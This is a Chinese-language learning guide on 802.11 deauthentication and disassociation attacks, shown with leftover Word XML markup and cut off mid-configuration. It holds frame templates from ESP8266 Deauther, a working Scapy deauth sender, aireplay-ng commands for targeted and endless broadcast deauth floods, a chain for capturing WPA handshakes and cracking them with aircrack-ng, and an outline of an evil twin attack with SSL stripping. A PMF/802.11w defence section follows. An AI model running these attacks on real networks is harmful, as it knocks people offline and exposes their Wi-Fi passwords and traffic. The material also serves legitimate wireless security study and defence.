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Deauth + Disassoc 完整学习指南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Deauth + Disassoc 完整学习指南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从零到精通的系统学习路径</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:i w:val="true"/>
          <w:color w:val="646a73"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，涵盖协议原理、帧结构分析、代码实现、工具实战、防御技术全链路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📚 第一阶段：基础理论篇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1.1 802.11 帧类型体系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802.11 协议将所有无线帧分为三大类，由帧控制字段（Frame Control）的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Type（2bit）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Subtype（4bit）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 共同决定：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管理帧（Management）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网络发现、认证、关联等控制平面操作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控制帧（Control）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辅助数据传输（ACK、RTS/CTS等）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数据帧（Data）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传输实际业务数据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预留（Reserved）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未使用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管理帧的常见子类型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Subtype值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Beacon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信标帧，AP周期性广播宣告存在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通知业务指示消息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Disassociation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解除关联帧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Association Request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解除认证帧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Authentication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动作帧（频谱管理、QoS等）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1.2 802.11 连接状态机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Wi-Fi 设备与AP的连接经历三个核心状态，理解状态机是掌握 Deauth/Disassoc 的前提：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State 1: 未认证、未关联</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ↓ 认证成功</w:t>
              <w:br/>
              <w:t>State 2: 已认证、未关联</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ↓ 关联成功</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>State 3: 已认证、已关联 ← 正常工作状态，可传输数据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状态跳转对应关系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Deauth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：State 3 → State 1（完全断开，需重新认证+关联）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Disassoc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：State 3 → State 2（仅断开关联，认证保留，可快速重连）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Authentication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：State 1 → State 2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Association</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：State 2 → State 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完整连接建立流程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一个完整的 Wi-Fi 连接建立包含 4 个阶段：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① 扫描阶段（Scanning）</w:t>
              <w:br/>
              <w:t xml:space="preserve">   STA → Probe Request（广播探测）</w:t>
              <w:br/>
              <w:t xml:space="preserve">   AP → Probe Response（响应）</w:t>
              <w:br/>
              <w:t xml:space="preserve">   或被动监听 Beacon 帧</w:t>
              <w:br/>
              <w:br/>
              <w:t>② 认证阶段（Authentication）</w:t>
              <w:br/>
              <w:t xml:space="preserve">   STA → Authentication Request（开放系统认证）</w:t>
              <w:br/>
              <w:t xml:space="preserve">   AP → Authentication Response（成功）</w:t>
              <w:br/>
              <w:t xml:space="preserve">   状态：State 1 → State 2</w:t>
              <w:br/>
              <w:br/>
              <w:t>③ 关联阶段（Association）</w:t>
              <w:br/>
              <w:t xml:space="preserve">   STA → Association Request（支持速率、能力等）</w:t>
              <w:br/>
              <w:t xml:space="preserve">   AP → Association Response（成功 + AID分配）</w:t>
              <w:br/>
              <w:t xml:space="preserve">   状态：State 2 → State 3</w:t>
              <w:br/>
              <w:br/>
              <w:t>④ 密钥协商阶段（4-Way Handshake）</w:t>
              <w:br/>
              <w:t xml:space="preserve">   M1: AP → STA (ANonce)</w:t>
              <w:br/>
              <w:t xml:space="preserve">   M2: STA → AP (SNonce + MIC)</w:t>
              <w:br/>
              <w:t xml:space="preserve">   M3: AP → STA (GTK + MIC)</w:t>
              <w:br/>
              <w:t xml:space="preserve">   M4: STA → AP (确认)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生成 PTK/GTK，开始加密通信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🔬 第二阶段：帧结构深度解析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2.1 802.11 MAC 帧头通用结构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802.11 帧都以 MAC 头开头，Deauth/Disassoc 帧也不例外：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字节偏移  字段                  长度    说明</w:t>
              <w:br/>
              <w:t>0        Frame Control         2字节   帧类型、标志位等</w:t>
              <w:br/>
              <w:t>2        Duration/ID           2字节   持续时间或关联ID</w:t>
              <w:br/>
              <w:t>4        Address 1             6字节   目标地址（接收方）</w:t>
              <w:br/>
              <w:t>10       Address 2             6字节   源地址（发送方）</w:t>
              <w:br/>
              <w:t>16       Address 3             6字节   BSSID或其他地址</w:t>
              <w:br/>
              <w:t>22       Sequence Control      2字节   序列号+分段号</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>24       Frame Body            可变    帧体内容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Frame Control 字段详解（2字节）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这是理解帧类型的关键，2字节共16位：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位  15 14 13 12 11 10  9  8  7  6  5  4  3  2  1  0</w:t>
              <w:br/>
              <w:t xml:space="preserve">     ┌───────────────────────────────────────────────┐</w:t>
              <w:br/>
              <w:t xml:space="preserve">     │  协议版本  │ 类型  │子类型│ 各种标志位...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└───────────────────────────────────────────────┘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Deauth 帧的 Frame Control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协议版本：00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Type：00（管理帧）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Subtype：1100（0xC，Deauthentication）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其他标志：通常全0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二进制表示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1100 0000 0000 0000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → 十六进制：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>0xC0 0x00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注意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：字节序问题！实际抓包中看到的是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0xC0 0x00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:i w:val="true"/>
          <w:color w:val="646a73"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，因为小端序存储。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Disassoc 帧的 Frame Control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Subtype：1010（0xA，Disassociation）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二进制：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>1010 0000 0000 0000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → 十六进制：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>0xA0 0x00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Deauth 帧完整字节分析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一个典型的 Deauth 帧只有 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>26 字节</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，极其精简：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实际字节序列（示例）：</w:t>
              <w:br/>
              <w:t>C0 00 3A 01 FF FF FF FF FF FF 00 11 22 33 44 55 00 11 22 33 44 55 00 00 01 00</w:t>
              <w:br/>
              <w:br/>
              <w:t>逐字节解析：</w:t>
              <w:br/>
              <w:br/>
              <w:t>C0 00    → Frame Control = 0x00C0</w:t>
              <w:br/>
              <w:t xml:space="preserve">            - Type = 00 (Management)</w:t>
              <w:br/>
              <w:t xml:space="preserve">            - Subtype = 1100 (Deauthentication)</w:t>
              <w:br/>
              <w:br/>
              <w:t>3A 01    → Duration = 0x013A (314微秒)</w:t>
              <w:br/>
              <w:br/>
              <w:t>FF FF FF FF FF FF  → Address 1 = FF:FF:FF:FF:FF:FF (广播地址)</w:t>
              <w:br/>
              <w:br/>
              <w:t>00 11 22 33 44 55  → Address 2 = 00:11:22:33:44:55 (源MAC，伪造的AP BSSID)</w:t>
              <w:br/>
              <w:br/>
              <w:t>00 11 22 33 44 55  → Address 3 = 00:11:22:33:44:55 (BSSID)</w:t>
              <w:br/>
              <w:br/>
              <w:t>00 00    → Sequence Control = 0x0000</w:t>
              <w:br/>
              <w:t xml:space="preserve">            - 序列号 = 0</w:t>
              <w:br/>
              <w:t xml:space="preserve">            - 分段号 = 0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01 00    → Reason Code = 0x0001 (Unspecified reason)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Reason Code 完整对照表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Unspecified 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未指定原因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通用断开，攻击最常用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Previous authentication no longer valid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先前认证不再有效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认证超时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Deauthenticated because sending station is leaving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发送站正在离开（Deauth）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设备主动离开网络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Disassociated due to inactivity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因不活动解除关联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空闲超时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Disassociated because AP is unable to handle all currently associated STAs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AP资源不足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关联数超限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 2 frame received from nonauthenticated station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收到未认证设备的Class 2帧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异常帧处理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 3 frame received from nonassociated station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收到未关联设备的Class 3帧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异常帧处理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Disassociated because sending station is leaving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发送站正在离开（Disassoc）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设备主动离开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 requesting (re)association is not authenticated with responding station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请求关联的设备未认证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关联前未认证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💻 第三阶段：代码实现解析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ESP8266 Deauther 源码分析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SpacehuhnTech 的 esp8266_deauther 项目为例，看 Deauth 帧是如何构造的：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帧结构定义（Attack.h）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Deauth帧固定大小：26字节</w:t>
              <w:br/>
              <w:t>const uint8_t deauthPacket[26] = {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    0xC0, 0x00,       // Frame Control: Deauthentication</w:t>
              <w:br/>
              <w:t xml:space="preserve">    0x00, 0x00,       // Duration</w:t>
              <w:br/>
              <w:t xml:space="preserve">    0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,  // Destination (广播)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  // Source (后续填充)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  // BSSID (后续填充)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    0x00, 0x00,       // Sequence Control</w:t>
              <w:br/>
              <w:t xml:space="preserve">    0x01, 0x00        // Reason Code: 1 (Unspecified)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发送函数实现（Attack.cpp）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Attack::sendDeauth(uint8_t* target, uint8_t* ap, uint8_t reason) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    uint8_t packet[26];</w:t>
              <w:br/>
              <w:t xml:space="preserve">    memcpy(packet, deauthPacket, 26);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    </w:t>
              <w:br/>
              <w:t xml:space="preserve">    // 设置目标MAC地址（偏移4字节）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    memcpy(&amp;packet[4], target, 6);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    </w:t>
              <w:br/>
              <w:t xml:space="preserve">    // 设置源MAC地址（偏移10字节）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    memcpy(&amp;packet[10], ap, 6);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    </w:t>
              <w:br/>
              <w:t xml:space="preserve">    // 设置BSSID（偏移16字节）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    memcpy(&amp;packet[16], ap, 6);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    </w:t>
              <w:br/>
              <w:t xml:space="preserve">    // 设置原因码（偏移24字节）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    packet[24] = reason;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    packet[25] = 0x00;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    </w:t>
              <w:br/>
              <w:t xml:space="preserve">    // 通过WiFi模块发送原始帧</w:t>
              <w:br/>
              <w:t xml:space="preserve">    wifi_send_pkt_freedom(packet, 26, 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硬编码模板</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：帧的大部分字段是固定的，用数组预定义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动态填充</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：只修改目标MAC、源MAC、Reason Code几个字段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原始帧注入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wifi_send_pkt_freedom()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 函数直接发送802.11原始帧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无需认证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：ESP8266 不需要连接任何网络就能发送管理帧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Disassoc 帧的构造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Disassoc 帧与 Deauth 几乎完全相同，只有 Frame Control 的 Subtype 不同：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uint8_t disassocPacket[26] = {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    0xA0, 0x00,       // Frame Control: Disassociation (唯一区别!)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    0x00, 0x00,       // Duration</w:t>
              <w:br/>
              <w:t xml:space="preserve">    0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,  // Destination</w:t>
              <w:br/>
              <w:t xml:space="preserve">    0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  // Source</w:t>
              <w:br/>
              <w:t xml:space="preserve">    0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  // BSSID</w:t>
              <w:br/>
              <w:t xml:space="preserve">    0x00, 0x00,       // Sequence Control</w:t>
              <w:br/>
              <w:t xml:space="preserve">    0x08, 0x00        // Reason Code: 8 (Sending station leaving)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Python 实现示例（Scapy）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Scapy 库构造和发送 Deauth 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scapy.all import *</w:t>
              <w:br/>
              <w:t>from scapy.layers.dot11 import Dot11, Dot11Deauth</w:t>
              <w:br/>
              <w:br/>
              <w:t>def send_deauth(ap_mac, target_mac, iface="wlan0mon", count=10):</w:t>
              <w:br/>
              <w:t xml:space="preserve">    """</w:t>
              <w:br/>
              <w:t xml:space="preserve">    发送Deauth帧</w:t>
              <w:br/>
              <w:t xml:space="preserve">    :param ap_mac: AP的MAC地址</w:t>
              <w:br/>
              <w:t xml:space="preserve">    :param target_mac: 目标客户端MAC，广播用 FF:FF:FF:FF:FF:FF</w:t>
              <w:br/>
              <w:t xml:space="preserve">    :param iface: 无线网卡接口名</w:t>
              <w:br/>
              <w:t xml:space="preserve">    :param count: 发送数量</w:t>
              <w:br/>
              <w:t xml:space="preserve">    """</w:t>
              <w:br/>
              <w:t xml:space="preserve">    # 构造802.11帧头</w:t>
              <w:br/>
              <w:t xml:space="preserve">    dot11 = Dot11(</w:t>
              <w:br/>
              <w:t xml:space="preserve">        addr1=target_mac,    # 目标地址</w:t>
              <w:br/>
              <w:t xml:space="preserve">        addr2=ap_mac,        # 源地址（伪造为AP）</w:t>
              <w:br/>
              <w:t xml:space="preserve">        addr3=ap_mac         # BSSID</w:t>
              <w:br/>
              <w:t xml:space="preserve">    )</w:t>
              <w:br/>
              <w:t xml:space="preserve">    </w:t>
              <w:br/>
              <w:t xml:space="preserve">    # 构造Deauth帧体</w:t>
              <w:br/>
              <w:t xml:space="preserve">    deauth = Dot11Deauth(reason=1)  # Reason Code = 1</w:t>
              <w:br/>
              <w:t xml:space="preserve">    </w:t>
              <w:br/>
              <w:t xml:space="preserve">    # 组合完整帧</w:t>
              <w:br/>
              <w:t xml:space="preserve">    packet = dot11 / deauth</w:t>
              <w:br/>
              <w:t xml:space="preserve">    </w:t>
              <w:br/>
              <w:t xml:space="preserve">    # 发送</w:t>
              <w:br/>
              <w:t xml:space="preserve">    print(f"发送 {count} 个Deauth帧到 {target_mac}")</w:t>
              <w:br/>
              <w:t xml:space="preserve">    sendp(packet, iface=iface, count=count, inter=0.1, verbose=False)</w:t>
              <w:br/>
              <w:br/>
              <w:t># 使用示例</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t># send_deauth("00:11:22:33:44:55", "FF:FF:FF:FF:FF:FF", "wlan0mon", 100)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🛠️ 第四阶段：工具实战篇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实验环境准备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支持监听模式（Monitor Mode）和数据包注入（Packet Injection）的无线网卡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推荐芯片：RT3070、RTL8812AU、Atheros AR9271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系统：Kali Linux（推荐）或其他 Linux 发行版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网卡兼容性检查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查看网卡信息</w:t>
              <w:br/>
              <w:t>iw list</w:t>
              <w:br/>
              <w:br/>
              <w:t># 检查是否支持监听模式（查看 "monitor" 是否在支持的模式列表中）</w:t>
              <w:br/>
              <w:t>iw list | grep "monitor"</w:t>
              <w:br/>
              <w:br/>
              <w:t># 测试数据包注入</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>aireplay-ng --test wlan0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监听模式配置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方法一：使用 airmon-ng（推荐）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查看无线网卡</w:t>
              <w:br/>
              <w:t>airmon-ng</w:t>
              <w:br/>
              <w:br/>
              <w:t># 开启监听模式</w:t>
              <w:br/>
              <w:t>airmon-ng start wlan0</w:t>
              <w:br/>
              <w:br/>
              <w:t># 验证（接口名变为 wlan0mon）</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>iwconfig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方法二：手动配置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先关闭网卡</w:t>
              <w:br/>
              <w:t>ip link set wlan0 down</w:t>
              <w:br/>
              <w:br/>
              <w:t># 设置为监听模式</w:t>
              <w:br/>
              <w:t>iw dev wlan0 set type monitor</w:t>
              <w:br/>
              <w:br/>
              <w:t># 开启网卡</w:t>
              <w:br/>
              <w:t>ip link set wlan0 up</w:t>
              <w:br/>
              <w:br/>
              <w:t># 设置信道</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>iw dev wlan0 set channel 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aireplay-ng Deauth 攻击实战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aireplay-ng --deauth &lt;数量&gt; -a &lt;AP_MAC&gt; -c &lt;目标MAC&gt; &lt;接口&gt;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参数详解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--deauth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Deauth 攻击模式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发送帧数，0=无限循环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 的 BSSID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-a 00:11:22:33:44:55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目标客户端 MAC（可选，省略则广播）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-c AA:BB:CC:DD:EE:FF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不检测 AP 是否存在（高级选项）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步骤1：扫描周围网络，找到目标AP</w:t>
              <w:br/>
              <w:t>airodump-ng wlan0mon</w:t>
              <w:br/>
              <w:t># 记录目标AP的 BSSID、信道(CH)、已连接的客户端(STATION)</w:t>
              <w:br/>
              <w:br/>
              <w:t># 步骤2：固定信道（可选，airodump会自动切换）</w:t>
              <w:br/>
              <w:t>iw dev wlan0mon set channel 6</w:t>
              <w:br/>
              <w:br/>
              <w:t># 步骤3：定向Deauth（踢掉单个客户端）</w:t>
              <w:br/>
              <w:t>aireplay-ng --deauth 10 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF wlan0mon</w:t>
              <w:br/>
              <w:br/>
              <w:t># 步骤4：广播Deauth（踢掉所有客户端，破坏力大）</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>aireplay-ng --deauth 0 -a 00:11:22:33:44:55 wlan0mon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5GHz 频段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：部分网卡需要加 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>-D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 参数，或确保网卡支持 5GHz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攻击无效</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：可能目标启用了 PMF（802.11w），或距离太远信号弱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发送失败</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：检查网卡是否支持注入，驱动是否正确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 Wireshark 抓包分析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常用显示过滤器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过滤器表达式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 Deauth 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wlan.fc.type_subtype == 12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wlan.fc.type_subtype == 0x000c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 Disassoc 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wlan.fc.type_subtype == 10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wlan.fc.type_subtype == 0x000a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所有管理帧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wlan.fc.type == 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特定AP的Deauth帧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wlan.fc.type_subtype == 12 &amp;&amp; wlan.bssid == 00:11:22:33:44:55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特定目标的Deauth帧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wlan.fc.type_subtype == 12 &amp;&amp; wlan.da == AA:BB:CC:DD:EE:FF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查看Reason Code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wlan.fixed.reason_code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抓包分析步骤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无线网卡设置为监听模式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Wireshark 选择监听接口开始抓包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应用过滤器 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>wlan.fc.type_subtype == 12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 Deauth 攻击，观察捕获的帧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点击帧查看详细结构，验证 Frame Control、Reason Code 等字段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🎯 第五阶段：攻击应用场景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WPA 握手包捕获（最经典应用）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完整攻击链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攻击者                                                    │</w:t>
              <w:br/>
              <w:t>│  ┌─────────┐     ┌─────────────┐     ┌────────────────┐  │</w:t>
              <w:br/>
              <w:t>│  │ 扫描网络 │────→│ 捕获握手包  │←────│ Deauth强制断开 │  │</w:t>
              <w:br/>
              <w:t>│  └─────────┘     └─────────────┘     └────────────────┘  │</w:t>
              <w:br/>
              <w:t>│                           ↓                               │</w:t>
              <w:br/>
              <w:t>│                    ┌─────────────┐                        │</w:t>
              <w:br/>
              <w:t>│                    │ 离线字典破解 │                        │</w:t>
              <w:br/>
              <w:t>│                    └─────────────┘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终端1：启动 airodump 捕获握手包</w:t>
              <w:br/>
              <w:t>airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture wlan0mon</w:t>
              <w:br/>
              <w:t># 参数说明：</w:t>
              <w:br/>
              <w:t># -c 6: 固定在6信道</w:t>
              <w:br/>
              <w:t># --bssid: 指定目标AP</w:t>
              <w:br/>
              <w:t># -w capture: 保存为 capture-01.cap</w:t>
              <w:br/>
              <w:br/>
              <w:t># 终端2：发送Deauth帧</w:t>
              <w:br/>
              <w:t>aireplay-ng --deauth 5 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF wlan0mon</w:t>
              <w:br/>
              <w:br/>
              <w:t># 终端1观察：右上角出现 WPA handshake 字样表示捕获成功</w:t>
              <w:br/>
              <w:br/>
              <w:t># 后续：离线破解</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>aircrack-ng -w wordlist.txt capture-01.cap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Evil Twin 邪恶双胞胎攻击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探测目标网络的SSID、信道</w:t>
              <w:br/>
              <w:t>2. 搭建同名 Rogue AP（信号更强）</w:t>
              <w:br/>
              <w:t>3. Deauth 攻击将用户从真实AP踢下线</w:t>
              <w:br/>
              <w:t>4. 用户自动重连到信号更强的伪造AP</w:t>
              <w:br/>
              <w:t>5. 攻击者作为中间人：</w:t>
              <w:br/>
              <w:t xml:space="preserve">   - DHCP分配IP</w:t>
              <w:br/>
              <w:t xml:space="preserve">   - DNS解析控制</w:t>
              <w:br/>
              <w:t xml:space="preserve">   - HTTP流量明文可见</w:t>
              <w:br/>
              <w:t xml:space="preserve">   - SSL Strip 降级HTTPS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Captive Portal 钓鱼页面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常用工具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airbase-ng / hostapd-mana（伪造AP）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WiFi-Pumpkin（集成化Evil Twin框架）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EAPHammer（针对企业WPA2-Enterprise）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bettercap（中间人攻击）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纯 DoS 拒绝服务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最简单直接的应用：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持续发送 Deauth 帧 = 目标设备完全无法上网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可针对单个设备，也可广播攻击整个网络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常见于恶意抢带宽、邻居干扰等场景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🛡️ 第六阶段：防御技术详解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PMF（802.11w）原理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PMF = Protected Management Frames</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，即受保护的管理帧，是 IEEE 802.11w 标准定义的安全机制。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传统管理帧：明文发送，无认证 → 任何人都能伪造</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>PMF管理帧：加密 + MIC校验 → 没有密钥无法伪造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保护的帧类型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Deauthentication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Disassociation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Action 帧（频谱管理、QoS、SA Query等）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不保护的帧</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（设计上不需要）：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Beacon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Probe Request/Response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Authentication（开放认证）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Association Request/Response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PMF 实现机制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单播管理帧保护（CCMP-MFP）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使用与数据帧相同的 CCMP 加密算法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密钥：PTK（Pairwise Temporal Key）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提供：机密性 + 完整性 + 数据源认证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广播/组播管理帧保护（BIP）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BIP = Broadcast Integrity Protocol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密钥：IGTK（Integrity Group Temporal Key）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提供：仅完整性保护（广播本身就是公开的）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IGTK 在 4-Way Handshake 的 M3 中分发给客户端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 Query 机制（关键创新）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客户端收到未保护的Deauth帧</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ↓</w:t>
              <w:br/>
              <w:t>不立即断开！先发起 SA Query</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ↓</w:t>
              <w:br/>
              <w:t>发送 SA Query Request 给AP</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ↓</w:t>
              <w:br/>
              <w:t>AP回复 SA Query Response（受保护）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ↓</w:t>
              <w:br/>
              <w:t>┌─────────────────────────────────┐</w:t>
              <w:br/>
              <w:t>│ 如果AP回复正常 → 忽略伪造的Deauth │</w:t>
              <w:br/>
              <w:t>│ 如果AP确实要断开 → 发受保护的Deauth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这一机制确保了向后兼容性——即使网络中有未受保护的管理帧，也不会被轻易利用。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PMF 配置实践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hostapd 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PMF 模式</w:t>
              <w:br/>
              <w:t># 0 = 禁用</w:t>
              <w:br/>
              <w:t># 1 = 可选（兼容模式）</w:t>
              <w:br/>
              <w:t># 2 = 强制（必须支持PMF才能连接）</w:t>
              <w:br/>
              <w:t>ieee80211w=2</w:t>
              <w:br/>
              <w:br/>
              <w:t># 可选：管理帧保护的密码套件（默认即可）</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
